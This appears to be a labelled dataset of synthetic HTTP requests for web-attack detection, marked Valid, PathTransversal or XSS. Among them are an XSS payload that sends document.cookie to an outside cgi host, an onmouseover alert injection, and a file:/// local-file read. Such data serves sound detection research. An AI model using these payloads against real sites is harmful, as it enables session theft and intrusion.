GET /r5FAUiG/tanioa/lGe1vdngtTx/rtotpls/Ecl4i9mao4shaeulrou/VfR2.ByCJdeleteF1K.css?39tit=97288376&aheynses=otnrebtr6tttf9ti7f&1tqtmte=Tnph-me&i2doow=73755948&nuo=5ouSoethh9sdTUr&AGTnulliQeInbinR=astraccess_logInenulli&lS5eagb=67615&trrh=uelfcopy&nvmoaesn9n2r=rz8rtMv5rn7&kTuffromG_=Ph3sen%26A%28%3Dhi&rsirTisn=8sVzTd&jyZM=xveptsisirfmrrd&t8a=2&c7t7se=rnrO HTTP/1.0
Host: 213.109.190.167:26413
Connection: close
Accept: video/*, video/*, image/*
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-cache
Client-ip: 25.155.215.195
Cookie: hwgetHfF=eLz
Cookie2: $Version="53"
Date: Fri, 29 Oct 04 16:54:38 CET
ETag: W/"L-asoLJ_w3zcW2hC_PGB"
Expect: 100-continue
From: foniz@txtCtS.de
If-Modified-Since: Fri, 20 Nov 09 10:39:17 CET
If-Unmodified-Since: Sun, 23 Apr 06 02:01:30 GMT
If-Match: "vahSFrjSQ6F_5AQ_8"
If-None-Match: *
If-Range: *
Max-Forwards: 7
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Basic ZGE5ZTpwZXJRYXR1Yg==
Authorization: Digest nonce
Range: 029-
Referer: /rg37/ifelc/agrsse.php4
TE: chunked
Trailer: Pragma
User-Agent: lJnEGOr http://www.eaLe.fr
UA-CPU: 68000
UA-Disp: 6878,6182,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7424x1666
Via: ooh/4.4 166.56.68.99, HTTP/5.6 www.eM1vdgr.gif
Transfer-Encoding: compress
Upgrade: tode/1.3
Warning: 789 148.216.97.93 "he2Hr6c" "Thu, 03 Aug 06 14:02:34 CET"
X-Forwarded-For: 180.232.254.90
X-Serial-Number: 780593
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10352
Start - Id: 13245
class: Valid
GET /0VAZczRVixuukgkOq.V/H8lsIexeck06CGwB0/iA/U80UCbdf3copyghttpsSw1/ilta7oeelsdSvb/ia/tFKIApns0bPMVcuS/roqUVOSZGEmb/oBPXxIj.swf?twv7xo9=tulep&mlSlhf1ssgs7net=tK9sBw&MRVQB1C=rdunion%5DmSbnobodyR&ewnleu9ehn=839667&taohia=%3F0nd&nsana=l6wd0tyeote&FCPDsrgQXKW=6630070&EyoCNIRdmG=utXaas&sfysOcgolebenR=LRrnsy%3Aqngrtnt&zotghawetawdce=3n60nwN&or4=admin&Tl0aWVS4S7copy=532975 HTTP/1.0
Host: 16.206.102.240
Connection: aehnra
Accept: video/mpeg, application/x-tar;q=0.3
Accept-Charset: utf-8, iso-2022-kr, iso-10646-ucs-2, koi8;q=0.7
Accept-Encoding: compress;q=0.2, deflate, compress, gzip;q=0.0
Accept-Language: enrnb-djfnt0;q=0.8, vi-tvape;q=0.4
Cache-Control: no-transform
Client-ip: 112.204.111.204
Cookie: 8yeaitIsoHtnhs=mnsgnhldp>;oeiaiamerBu=ttepeybsny0t
Cookie2: $Version="9"
Date: Sun, 26 Sep 04 08:06:36 GMT
ETag: W/"is3KPRolYGtkC5GT"
Expect: 100-continue
From: berlo@UooOhol.cz
If-Modified-Since: Tue, 03 May 05 07:26:01 UTC
If-Unmodified-Since: Thu, 09 Feb 06 24:59:25 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 7221
MIME-Version: 0.1
Pragma: dcdn8th3='HhHxeho'
Proxy-Authorization: Ooasqs dwno=ntjiba
Authorization: NTLM YXRYb3plZW9sbHo1MWVud3RoNjVzZG9hNW9laGhlaXV0YmlhZXNpYTVjSWY=
Range: 16-5
Referer: http://oIyeaaU.fr/eyoh.php
TE: deflate,deflate
Trailer: Pragma
User-Agent: Mozilla/3.6 (compatible; Konqueror/6.7; Mac OS X; ebsve; vaStLt76)
UA-CPU: MIPS
UA-Disp: 2503,069,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 2344x540
Via: HTTP/3.6 115.167.156.91, HTTP/4.5 www.rifmdn.html, 0.0 65.93.133.204
Transfer-Encoding: compress
Upgrade: cdmd/1.3, tr0h/8.6, nesh/6.4, qnH/1.5, naAil/7.8
Warning: 198 157.148.141.227 "pngahiabduinT" 
X-Forwarded-For: 137.114.108.160
X-Serial-Number: 4810868204268
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13245
Start - Id: 44797
class: PathTransversal
GET /uDr4K_UHC/h7u1bnj0/hjIgn4Wn/nikchmbttE9ahkn/LJ@jISYFZ_greplace2/b5ofmeaeej/CTand-V.html?hgotte67tQhahim=pTmu&XEQmem_9d=doc%28++++file%3A%2F%2F%2Fc%3A%2Fbnp%2Fgcjleeiz.xml%29&EccxaTbiesO=8 HTTP/1.1
Host: www.trixehlan.net
Connection: otuvaaa
Accept: image/*;q=0.1, audio/*, application/*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *;q=0.8
Cache-Control: min-fresh=8
Client-ip: 166.74.134.8
Cookie: utatoui=  iineIe5betweenfromp0nynRdor(;pamr=1tnfh;_8U9jLP=284855;gitsouI=wfnraetuyaoKhe;fieomesrsgh=elsformnahAnedaer\;5ai5ZdIGlJFM=petB7pcnkmCH
Cookie2: $Version="56"
Date: Sat, 19 Jul 08 13:43:14 CET
ETag: W/"djyw31vse5DU8jEaNO_"
Expect: 100-continue
From: Cmaxdcp@rimabEod.be
If-Modified-Since: Tue, 19 Jul 05 15:44:20 CET
If-Unmodified-Since: Wed, 02 Apr 08 21:37:59 UTC
If-Match: *
If-None-Match: "recqCUxNclLJEVZDwYA"
If-Range: Thu, 05 Jul 07 13:20:12 UTC
Max-Forwards: 3
MIME-Version: 7.4
Pragma: foct='baer9g'
Proxy-Authorization: Digest qop=auth
Authorization: Digest uri=http://www.LIst.org/Raue/prueq9y.cfm
Range: -31658,860-,84040-975982
Referer: /2herlkss.cfm
TE: deflate,chunked
Trailer: Expect
User-Agent: Mozilla/3.6 (X11; U; Linux i586 0.3; fi-4n; rv:9.3.3) Gecko/69454422
UA-CPU: MIPS
UA-Disp: 3445,5667,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 5717x165
Via: 7.4 www.bcgs.tiff, 2.6 www.YodeE4.shtml, 9.6 25.113.223.183:1
Transfer-Encoding: deflate
Upgrade: ntSos/7.8, twuyc/7.4, v1khi/3.8, ftess/6.0
Warning: 136 www.f72ts.jpeg "daakn3ltgiptelaits" "Sat, 10 Oct 09 20:12:41 UTC"
X-Forwarded-For: 4.75.179.74
X-Serial-Number: 2157159271334
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44797
Start - Id: 6318
class: Valid
POST /n0-pG-/his@-7q/hLvR_Tj4A6KVCU5Iy.cfm? HTTP/1.0
Content-Length: 56
Content-Language: of4a,tieEnlys,Wdhait
Content-Encoding: deflate
Content-Location: http://OhseEibr.fr/ns4liz/omtm/lgeUtb/ss2S5od/lwrso.css
Content-MD5: bnRIbnd0bHVzRTVuNW0zdA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Sep 09 15:39:06 GMT
Last-Modified: Sat, 03 Jan 09 13:12:20 GMT
Host: www.kznuy.cz:80
Connection: keep-alive
Accept: */*
Accept-Charset: windows-874, iso-8859-3;q=0.0, iso-8859-1;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 222.117.220.20
Cookie: tvojrenin=-=updateh;aulnetoEtKaoei=hs%oe
Cookie2: $Version="988"
Date: Mon, 23 Feb 09 21:25:53 GMT
ETag: W/"y7vQYUVkegGvS08z"
Expect: miFr=fodlt;zoreEsSl
From: ai8tEt@dHaaiz4iys.net
If-Modified-Since: Thu, 11 Sep 08 03:55:52 UTC
If-Unmodified-Since: Sat, 22 Sep 07 11:31:19 GMT
If-Match: "@SaWYJEKVcPVOpFO"
If-None-Match: "3P0U9-hEfl20M0c.FO"
If-Range: "QX-.sYiMxn_84IXpUc"
Max-Forwards: 6083
MIME-Version: 0.0
Pragma: tdhs=9olc
Proxy-Authorization: yiIr IiWelvS=hslc
Authorization: Basic b25hdHJtOnpvbG9zNQ==
Range: 137601-
Referer: http://www.ri8OEf.de/SieoyT.aspx
TE: deflate;q=0.8,gzip
Trailer: Transfer-Encoding
User-Agent: gNy0PCrU http://www.Ererf.it
UA-CPU: 68000
UA-Disp: 2381,870,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 679x627
Via: 4.7 www.nUnpi.shtml:5, ljae0a/1.3 216.62.172.34, 6.6 www.tcgsdn3Z.htm
Transfer-Encoding: compress
Upgrade: 7nda/8.0
Warning: 623 137.176.166.196 "nmTcivtnt2saa2c" 
X-Forwarded-For: 161.237.188.1
X-Serial-Number: 9387717978
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

imwrhothpqlh=t8eetda0hyggupr&Ip=6&zMdcmdurSNP=5000509679

End - Id: 6318
Start - Id: 31517
class: Valid
GET /te/i0en8@klYD5yBK/uJIkzK3iJEV2Ga6DrouH/oVHd7RCxpb/inneosexti/CALcmd/tuN3Kp/ARdsystemcE.css?feleyoepW0onrh=6342122 HTTP/1.0
Host: www.nhaRzPrcmn.com:69704
Connection: xu6e9
Accept: */*
Accept-Charset: iso-8859-4, x-mac-cyrillic
Accept-Encoding: *
Accept-Language: cds-sneean, ilradot-ols;q=0.6, y-ioDneiie;q=0.1, ioearslT-os8idi, eesei-edoeirms
Cache-Control: eensgSSl=epo3NbmE
Client-ip: 210.251.158.238
Cookie: dzeSaiaNcajt=cdwx0?ehE;etsy=aa
Cookie2: $Version="9"
Date: Tue, 24 Nov 09 19:23:06 CET
ETag: W/"75Iyt@O-1FoGMNoVk"
Expect: lzbseems=indnu
From: nuBost@wx6o1.fr
If-Modified-Since: Thu, 29 Sep 05 19:35:42 CET
If-Unmodified-Since: Mon, 14 Apr 08 15:36:31 GMT
If-Match: "cF1Kl6-MiDUz50HUpoT3"
If-None-Match: "Njbqx3RzKG9tB.wey"
If-Range: "Drzr7ODiv._2NeSu3D"
Max-Forwards: 40
MIME-Version: 4.5
Pragma: o='hha'
Proxy-Authorization: Digest nonce
Authorization: Digest opaque="giu2ra"
Range: -89812,-061835,42050-159934
Referer: http://www.eed3c.ch/udibx/t4yls9/tt4st/57aR.msf
TE: gzip,deflate;q=0.5,trailers
Trailer: If-Match
User-Agent: Mozilla/9.1 (Machintosh; U; PPC 8.7; ma-tc; rv:1.2.9) Gecko/85629140
UA-CPU: 68000
UA-Disp: 254,5965,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 484x1465
Via: 4.4 244.212.144.127, 1.0 www.grfc4.jpg, 9.9 71.172.203.142
Transfer-Encoding: gzip
Upgrade: jR6st/3.9, fxbl/4.6, swoeIh/6.1
Warning: 579 85.189.100.2 "46iij5Omnn" 
X-Forwarded-For: 41.171.103.8
X-Serial-Number: 5515370509152
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31517
Start - Id: 23910
class: Valid
GET /em4wPCUUGJoMOtO0/iaceleiyhtme1k/t2JCfqJ4/6bf0wabJwJrignetD/jghebegEEee/onBy/aUIm/8tttpbemwtqcer4et.mspx? HTTP/1.1
Host: www.nieRiz8at.fr
Connection: sr6abat
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 16.124.33.245
Cookie: hc7qeietaeDsi=okasRALe8c;s0ndeh=76201;_Yf0IB1=4nmee7onaneftotblf
Cookie2: $Version="9"
Date: Sun, 20 Aug 06 16:27:40 GMT
ETag: "LQMvowedDxLcOy7jw"
Expect: l9rgded=egntpm;osnEt2rs
From: gccehN@uRradmbtae.biz
If-Modified-Since: Tue, 04 Nov 08 03:23:33 CET
If-Unmodified-Since: Sun, 25 Feb 07 07:47:55 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 4
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: 1m1o hniwe=rioiti
Authorization: Digest algorithm=MD5
Range: 9-,-0501
Referer: http://www.Roeatsva.de/Telyu/Huynxclc/w0aa/lidae/ioev.msf
TE: gzip
Trailer: Max-Forwards
User-Agent: jLHvfaigs (nTCPQzi0n4)
UA-CPU: Sparc
UA-Disp: 722,7012,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 7253x9892
Via: 0.5 23.102.47.220, 2.9 221.113.209.231:89484, HTTP/0.0 www.6anscx.js
Transfer-Encoding: identity
Upgrade: tehni/0.9, Cea4fl/2.0, ztoh/4.3, pe6/2.9, ad9/9.3
Warning: 941 www.oEhntdsr.htm "tUs5csE0e0rt17tgQw6" 
X-Forwarded-For: 8.218.42.202
X-Serial-Number: 383867
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 23910
Start - Id: 10165
class: Valid
GET /cObr2khXRzFy9jXt/oSqWSF3JHrnUQPGGdr0/ta86-J/54.bdP.nrzm/z_Gkicb8DzUjuPi/aIcwlsdeEeeosjtny/ecogvU.sh? HTTP/1.0
Host: www.njlJ8ilo.org
Connection: keep-alive
Accept: image/*, text/xml
Accept-Charset: *;q=0.9
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-cache
Client-ip: 206.184.127.225
Cookie: PToHKAZ7OyND=097003
Cookie2: $Version="0"
Date: Sun, 18 Jan 09 11:46:48 UTC
ETag: "UnbrD7SaHsbRQN8"
Expect: Vragla=VgAer;e1sEliaf
From: ED5c3ek@guAiepot1d.fr
If-Modified-Since: Sun, 06 Aug 06 12:29:29 CET
If-Unmodified-Since: Tue, 20 Sep 05 09:41:42 CET
If-Match: "Ab8YD-nz9OnWeh3Bx"
If-None-Match: "4ppMGY3ZDj7vZd5N@j"
If-Range: Tue, 29 Jan 08 18:02:44 CET
Max-Forwards: 2008
MIME-Version: 3.0
Pragma: no-cache
Proxy-Authorization: NTLM b3R0bnJtdFQzdHBseXNzaTNmYzVvaXl0ZXJ1b2VhY2ZvOQ==
Authorization: 4Hha1e heebrhs=hsi8iit
Range: 35-
Referer: /9itE/8urty/zqfa.wmn
TE: chunked;q=0.4,chunked;q=0.2,trailers
Trailer: TE
User-Agent: d1vpgVRe8o http://www.uBrs.org
UA-CPU: x86
UA-Disp: 7262,260,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 103x309
Via: HTTP/7.7 www.2e8I03.html
Transfer-Encoding: 4rrmah
Upgrade: toiw/9.5, atmso/8.6, 3vnwf/5.8
Warning: 109 252.20.208.165 "rNuyl" "Mon, 17 Jul 06 17:30:19 GMT"
X-Forwarded-For: 7.157.226.155
X-Serial-Number: 87261
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10165
Start - Id: 47609
class: XSS
GET /dhbEsrt92au2e/foDT6n1lis/F3p/sg0nGA_mU@K7X8GP0jSh.cfm?v866ttmpdDML6@=m1e&xt=ui3TN4aooegwe&kNDWpasswddEs=%3Cimg+src+%3D%22+++reet+++%22onmouseover++++%3D++%22%5Balert+%28%275blenje7%27%29%3B%5D+++%22++++%3E&eovbtssnTDcdb=fuj&bainsr=759776&lsfsnmbmd=bodyds&BrcpTL6ametaEnph-.=tin&pIeoo4=228896&iinepnmva=oslenbn&openihttpsOiESXEi@=570311&ql=eTp3dlhoteitaVqLsZ&bhestttjhndi=rmeiiexec%25&pir5eqjclaE=3InEEKo HTTP/1.0
Host: www.21cof.biz
Connection: close
Accept: audio/*;q=0.4, image/png
Accept-Charset: *;q=0.8
Accept-Encoding: gzip, gzip;q=0.5, deflate, identity;q=0.1
Accept-Language: *
Cache-Control: no-cache
Client-ip: 254.77.17.52
Cookie: hsiiooarr=positionx;tpcoliMSk=848;bbN1nddofTe=7nAtzt;be=defiedelete;cozan2=s|Ee%;o0of5=yl7e@TDv@E
Cookie2: $Version="3"
Date: Fri, 01 Dec 06 05:37:47 GMT
ETag: "@Xjp1ovKWikgKE4aj"
Expect: pUonr4u1
From: b5GeiRai@2s2t.st
If-Modified-Since: Thu, 24 Jan 08 06:18:35 GMT
If-Unmodified-Since: Mon, 19 Jan 09 20:23:26 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 15 Mar 10 15:42:41 UTC
Max-Forwards: 8
MIME-Version: 8.3
Pragma: hryrcpe=7iap
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: tl7roE r0ua199a=uE1o5
Range: 393273-
Referer: /tUetzryo/AeDybret/miaoliGe/ns90meno.html
TE: trailers,gzip;q=0.9,trailers
Trailer: Accept-Charset
User-Agent: fyaefe
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 608x141
Via: 5.5 134.39.107.235, 0.0 www.t4en.js:145
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47609
Start - Id: 47393
class: XSS
GET /e3IBCthFzFGqZw@NR/6MwEdmetniElihlN5si.js?QjEBs4hgU=%3Cstyle++++type+++%3D++++%22text%2Fjavascript+++%22+%3E%5Bdocument.location.replace++%28%27http%3A%2F%2Fwww.erst.com%2Fcgi-bin%2Fetneta.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fstyle+++%3E HTTP/1.0
Host: www.sf1ae.gov
Connection: keep-alive
Accept: image/jpeg
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.8
Accept-Language: o3tEaor-sas, 4-rtd, AT5hsnu-otioyx, uHSo-6T
Cache-Control: no-cache
Client-ip: 253.72.77.117
Cookie: 5kN0e6includetelnetEHY=cdueeur-c;eqAdc=g hiiccr[(;is=ee1qB.EQe;exec45-fSBT5e=s3lzlm]5g)er;ethtniOteeictau=OHkjtdhp
Cookie2: $Version="92"
Date: Sun, 15 Aug 04 22:56:09 CET
ETag: W/"Zs@tcgHlxs@J9KnP77n"
Expect: 100-continue
From: hoetafry@daffCU.org
If-Modified-Since: Fri, 12 Nov 04 03:42:00 GMT
If-Unmodified-Since: Sun, 14 Mar 04 12:22:18 GMT
If-Match: "4Y8nSEt-_TiAm7GBoO6"
If-None-Match: *
If-Range: Sun, 01 Nov 09 02:51:13 GMT
Max-Forwards: 8508
MIME-Version: 4.8
Pragma: u='a'
Proxy-Authorization: cHest eInm=wotttdoe
Authorization: NTLM ZWFldnJyZXNBbU5naW1JbnRlY3B0dnJyZXN6b2VjbnJlc2Vz
Range: 5469-3,1126-
Referer: /pr3nsrih/afihsTs/tcokmt/IrEukh/oddhn.cgi
TE: chunked;q=0.4,chunked;q=0.7,trailers
Trailer: Expect
User-Agent: eortja39nHys
UA-CPU: StrongARM
UA-Disp: 0322,0692,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 1670x058
Via: FTP/9.9 73.50.209.6, FTP/0.8 www.oqth.shtml
Transfer-Encoding: gzip
Upgrade: uns/4.6, rb2/9.4, tsywas/1.7, Onrj/5.3, anii/8.9
Warning: 270 120.123.100.132 "hvi74Edbooyr" "Mon, 07 Jan 08 14:05:19 UTC"
X-Forwarded-For: 39.101.79.171
X-Serial-Number: 6529673477463
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 47393
Start - Id: 3376
class: Valid
GET /snrsubhhTonT/uxai/yA7suT8@/deeeoh6gkntttnaat/bMyPupdatezhtaccesjZi3/moQB75ynMtJEJnQf/rmJgM.cgi?hoeeEph9vbch6oi=uluf6suehnfjny&aan=627&dd=h-r&tsdoq2HntEcrtie=w%3E5ah&kTeSW0aYCzi=480198885&P6R_9g=71&ECbYDNF-Gt6i=0855&et5tmiEswEhm=ytu-p%3F%3E%28htpdR%24eaccess_log&otce=n3rn9re%7Ecsstdin3TR&gFkuPPEf@=778&asphlrtoros=kisCec4ki HTTP/1.1
Host: 165.157.110.149
Connection: close
Accept: */*
Accept-Charset: x-mac-korean, big5;q=0.4, ks_c_5601-1987, windows-1250, x-mac-japanese;q=0.2
Accept-Encoding: compress, deflate;q=0.6, deflate;q=0.8, deflate, deflate
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 54.237.58.169
Cookie: eoemoaoc2tynO=heochildOPztmpr;S1G3htaccesgkVcopy=Uyigea]:t6S/usrfRe 
Cookie2: $Version="2"
Date: Mon, 07 Jul 08 09:30:57 CET
ETag: "LgAp3oh2ZhPGlBF"
Expect: la7bg=npatboe;waer6eT=et3tnr
From: 6gOqlo@tI0ceenh.st
If-Modified-Since: Sat, 02 Feb 08 02:25:39 GMT
If-Unmodified-Since: Sun, 07 Nov 04 01:43:05 GMT
If-Match: *
If-None-Match: "7Ylui7TCsC8ypCZxa"
If-Range: *
Max-Forwards: 2
MIME-Version: 2.6
Pragma: no-cache
Proxy-Authorization: Basic am1YaThzdHQ6MWFtYWEyOA==
Authorization: Digest nc=C5309BbD
Range: 65294-
Referer: /hoi8gi/hq3r.conf
TE: gzip,deflate;q=0.8,deflate;q=0.5
Trailer: Upgrade
User-Agent: fdcraeetey/9.8.7.4.4
UA-CPU: MIPS
UA-Disp: 351,552,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 0842x046
Via: 2.7 153.12.78.154, FTP/4.8 112.225.197.228, 0.6 111.124.75.228
Transfer-Encoding: compress
Upgrade: opnb/1.0, vmbtS/8.3, Reiep/2.3
Warning: 873 1.206.34.142:2 "iehsLoeRm4h" "Mon, 06 Jul 09 01:55:19 CET"
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3376
Start - Id: 25668
class: Valid
GET /9mttdsgatuyf/dllike3mJ3oroRpF/ty@WZ_x379havingbS@/Rota/o2ujkK.I1eeSYD3/o0waidit8oti4Npr.aspx?VservicesaKGetc=Reh&DCSopenXNTV=iaee&dT2cFnle=ttshndGrgoytf HTTP/1.1
Host: 148.178.215.103
Connection: close
Accept: text/*;q=0.1, video/*, text/*;q=0.4
Accept-Charset: *
Accept-Encoding: deflate;q=0.0
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 6.192.119.3
Cookie: iecoui=71201;zt8oacLxbIh=ri;qOreplaceJ5kUPMRcK=370;sxahtlsp0aeocsn=70808
Cookie2: $Version="81"
Date: Thu, 30 Nov 06 17:36:29 CET
ETag: "fUrmoEcADl1vOphaKG8T"
Expect: 100-continue
From: jrwaet@5StiLntEa.org
If-Modified-Since: Thu, 18 Sep 08 13:09:56 UTC
If-Unmodified-Since: Tue, 02 Oct 07 18:49:02 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 23 May 08 22:51:37 CET
Max-Forwards: 9
MIME-Version: 1.7
Pragma: 6Te='ns'
Proxy-Authorization: Digest qop=auth-int
Authorization: NTLM YXNyc2FjWXNndG51Y3B5dTd0dzl1N3RzMnI5ZW5yY3VwdG1ic2N1aQ==
Range: 39509-,-41,-519051
Referer: /ieyoE4/3otps.html
TE: chunked;q=0.0
Trailer: Trailer
User-Agent: 8Gs3/4.6.2
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 8973x257
Via: 3.0 www.onnbcD.htm
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 768 71.160.96.112:815 "eemtw" "Sat, 22 Jan 05 09:40:57 GMT"
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25668
Start - Id: 34333
class: Valid
POST /nJS8olLWwe2hewTwj9cX/RMcht1/Jroeu2mnt7d/dTiyE@xt/PhLidrcAnK-etcy/pKz4n0mwhazUam/Etlntha/yUuiVIwIv@wRb6I.aspx? HTTP/1.1
Content-Length: 147
Content-Language: ln,o8Rire
Content-Encoding: gzip
Content-Location: http://www.osmtt.uk/grorf/6r8tqg/eon4/tune/0ahweays.cfm
Content-MD5: YmVlTGN4clNlb2xuczR0bg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 06 Jan 08 19:20:58 UTC
Last-Modified: Mon, 01 Mar 04 01:55:09 CET
Host: 64.71.163.157
Connection: keep-alive
Accept: video/*;q=0.9, application/*
Accept-Charset: *
Accept-Encoding: *;q=0.1
Accept-Language: *
Cache-Control: no-store
Client-ip: 116.18.167.222
Cookie: S6DubnWmD1=95094;eXice=093816848
Cookie2: $Version="8"
Date: Tue, 30 Mar 10 23:07:21 CET
ETag: W/"GL@LsclmgUamZEDsv_"
Expect: 100-continue
From: 8Tmtnybi@toleu.gov
If-Modified-Since: Fri, 25 Mar 05 12:08:25 CET
If-Unmodified-Since: Fri, 06 May 05 20:02:22 UTC
If-Match: "rSar2JP0uH0-L_Ma"
If-None-Match: *
If-Range: Tue, 09 Feb 10 08:51:01 GMT
Max-Forwards: 5952
MIME-Version: 5.0
Pragma: muna='s'
Proxy-Authorization: NTLM aU9yd2hldW1uZ3RycnFtdUhqZUE0b3U5cmVzdGJyc3RhZTFnYWk1bnZveWVMbQ==
Authorization: NTLM dDBvaXV0aWVlYTNjYW5hQW16ZWFiZUdwYW9sZGVic2xtaGI3M2l6ZWF1
Range: -92864
Referer: /Rt0hE4p/an9g0/sdmn/vn3ria.bin
TE: gzip;q=0.3,deflate,deflate;q=0.9
Trailer: TE
User-Agent: tooeqnsfc4etea
UA-CPU: Sparc
UA-Disp: 3186,9762,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 9714x0556
Via: 3.1 48.196.153.63, 6.9 59.222.233.126, 1.8 173.143.52.61:7739
Transfer-Encoding: gzip
Upgrade: lOrae/2.3, unerfn/4.1, roft/4.9
Warning: 720 www.Aeesaq.jpg "emdinlt5scc" "Tue, 21 Sep 04 09:33:30 CET"
X-Forwarded-For: 143.200.9.7
X-Serial-Number: 57690312658
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~

yensIiaY=993&oelfcle02ia3iTe=11527253&EHRPisn=829564&h2seTszyNEan=/httpwp-abiframe3ahdeleter$c&BUMmwGhv=tzb&yrMCapdbaOguh8=Yeih&8mZTtesue=t2de2

End - Id: 34333
Start - Id: 8691
class: Valid
GET /qyIiSTTOzBVm/0UsV22nzBvrJpgt.gif? HTTP/1.0
Host: www.kgNhf.be:6291
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.1, iso-2022-kr;q=0.2, iso-8859-2;q=0.7
Accept-Encoding: 
Accept-Language: aHs0yira-t6uh;q=0.2, vLw-s;q=0.1, 0hhxq-mJu;q=0.5, 2ee1a-hocpt;q=0.4
Cache-Control: feSAw='thfag76o'
Client-ip: 173.156.22.51
Cookie: m9=317;an=ddTs3ka;dndipMenenrgat=23857079;a3ta50rgan1neou=eua Hudc(vsae;WrgPQ8D.213=riee
Cookie2: $Version="55"
Date: Wed, 01 Jul 09 17:00:31 GMT
ETag: W/"5N1KCerL_nmTKCw"
Expect: 100-continue
From: abHee@dqDytats.biz
If-Modified-Since: Tue, 17 Jul 07 02:00:31 UTC
If-Unmodified-Since: Mon, 28 Mar 05 19:02:53 GMT
If-Match: "VBbH7pcH8fYJi.rb"
If-None-Match: "RQOacf_oWTP-XOApXa_y"
If-Range: Thu, 04 Aug 05 04:37:40 CET
Max-Forwards: 2
MIME-Version: 5.6
Pragma: poefdG='NoEh3'
Proxy-Authorization: iaays9 2e7s=dduas8it
Authorization: Basic OWR0bWE6cm9lMDE=
Range: -1251,-8,78356-
Referer: http://lsht.ch/uutc/toerrp.tiff
TE: chunked;q=0.6
Trailer: Accept-Charset
User-Agent: uekp/9.4.5.3.7
UA-CPU: PowerPC
UA-Disp: 3582,4284,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 8393x485
Via: HTTP/6.9 www.oa59sso.tiff
Transfer-Encoding: deflate
Upgrade: 81ihR/9.8, iiess/1.4, hse/9.5
Warning: 642 www.n84b.htm "lyajg" "Mon, 15 Jan 07 21:15:54 UTC"
X-Forwarded-For: 142.15.151.110
X-Serial-Number: 396730650206
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 8691
Start - Id: 8524
class: Valid
GET /ZscriptKk.Henph-/a45ZmyLY@pAYVDMQy/ni7ihzedsm/deedsegsttou/lexecZjxFor4QOopen-PdI/ssrnc26e/aZ/GplePlqynmkra6n/g1vI5zku9l/includeTMw0kz@_2tzGwW/nllaserie.dll?ur3irsut5rhes=665785 HTTP/1.1
Host: www.th5oiteact.uk
Connection: close
Accept: image/*, image/png, audio/basic
Accept-Charset: *
Accept-Encoding: *
Accept-Language: A-jAarnj
Cache-Control: no-cache
Client-ip: 19.109.17.170
Cookie: ent=99;rtsaItat=89
Cookie2: $Version="3"
Date: Tue, 22 Jan 08 12:34:13 CET
ETag: "CG6ji61GJfQuxBqTAla"
Expect: slYre
From: laaisi@nHuI4faw.be
If-Modified-Since: Tue, 11 Jul 06 20:29:54 CET
If-Unmodified-Since: Sun, 08 Apr 07 23:41:32 UTC
If-Match: *
If-None-Match: *
If-Range: "pTl4E-wTEVK7raRYTKYS"
Max-Forwards: 9909
MIME-Version: 7.7
